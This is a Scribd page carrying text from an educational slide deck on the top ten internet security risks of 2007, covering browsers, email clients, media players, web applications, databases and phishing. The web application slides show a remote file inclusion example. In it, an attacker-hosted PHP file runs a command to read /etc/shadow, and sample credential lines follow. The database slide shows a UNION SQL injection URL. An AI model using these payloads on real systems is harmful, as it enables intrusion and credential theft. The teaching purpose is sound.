Scribd Logo
Загрузить

Добро пожаловать в Scribd!

  • Top-10 2007 Security Risks: Jitender Vig

    Загружено:

    Vipul Partap
    14 просмотров18 страниц
    internetsecurity

    Оригинальное название

    internetsecurity-1211034956723602-8

    Авторское право

    © © All Rights Reserved

    Доступные форматы

    PPT, PDF, TXT или читайте онлайн в Scribd

    Этот документ был вам полезен?

    Это неприемлемый материал?

    Пожаловаться на этот документ
    internetsecurity

    Авторское право:

    © All Rights Reserved
    Скачайте в формате PPT, PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    14 просмотров18 страниц

    Top-10 2007 Security Risks: Jitender Vig

    Загружено:

    Vipul Partap
    internetsecurity

    Авторское право:

    © All Rights Reserved
    Скачайте в формате PPT, PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    из 18

    INTERNET

    SECURITY
    Top-10 2007 Security Risks
    Jitender vig
    Summary
    Client-side Web Browsers
    Email Clients
    Vulnerabilities Media Players

    Server-side Web Applications


    Database Software
    Vulnerabilities
    Security Policy and Phishing/Spear Phishing

    Personnel
    Instant Messaging
    Application Abuse Peer-to-Peer Programs

    Zero Day attacks


    Zero Day Attacks
    Client-side Vulnerabilities
    Web Browsers

    Internet Firefox
    Adobe
    reader

    Explorer Quicktime

    Graphics
    ActiveX HTML GDI function
    Spoofing Memory Crafted
    Help corruption URI
    SetAbortProc
    Email Clients

    Microsoft Mozilla
    Outlook Thunderbird

    Buffer Malformed Corrupt Javascript Denial Of


    Over flow code memory Service
    Media Players

    Window Apple Adobe


    Media Flash
    Player QuickTime Player

    Buffer Crafted Corrupt Buffer Denial HTTP


    Over Header memory Over Of Refer
    flow flow Service Header
    Clients-Side Vulnerabilities

    Spam Root kits

    Phishing Denial of
    Service

    Distribution
    of
    Malware
    Aims Bot-net
    Server-Side Vulnerabilities
    Client Server

    Network
    (Internet)

    Vulnerabilities
    Web Applications
    Hacker www.mysite.com/index.php
    $>wget www.mysite.com/ Index.php

    index.php?page=www.haxor.com/cat Network <?php


    (Internet) include($page.'.php');
    ?>
    Www.mysite.com/indexindex.php

    USER:PASSWORD Vulnerabilities
    root:S5AZl~]
    Linus:@e)&#$*^%
    Httpd:Jpzi5z@
    www.badguy.ru/cat.php
    cat.php
    <?php
    passthru("cat /etc/shadow");
    ?>
    Database Software
    http://localhost/admin.php?module=news&id= -
    SQL Injection 1 union select 0,1,database(),3,4,5,6,7 from membres--

    Use of default configurations with default user names


    and passwords.

    Use of weak passwords for privileged accounts.

    Buffer overflows in processes that listen on well known


    ports.
    Security Policy and Personal
    Phishing/Spear Phishing
    Application Abuse
    Instant Messaging

    IM
    Peer-to-Peer Programs
    Zero Day Attacks
    Conclusion
    Internet security is hard because :

    Its hard to counter unknown vulnerabilities in products

    Even security products themselves often have unknown vulnerabilities

    Abstraction favors the adversary

    Some problems (e.g., spam) are not technical in nature

    People are sloppy, greedy, and sometimes nave


    End

    Вам также может понравиться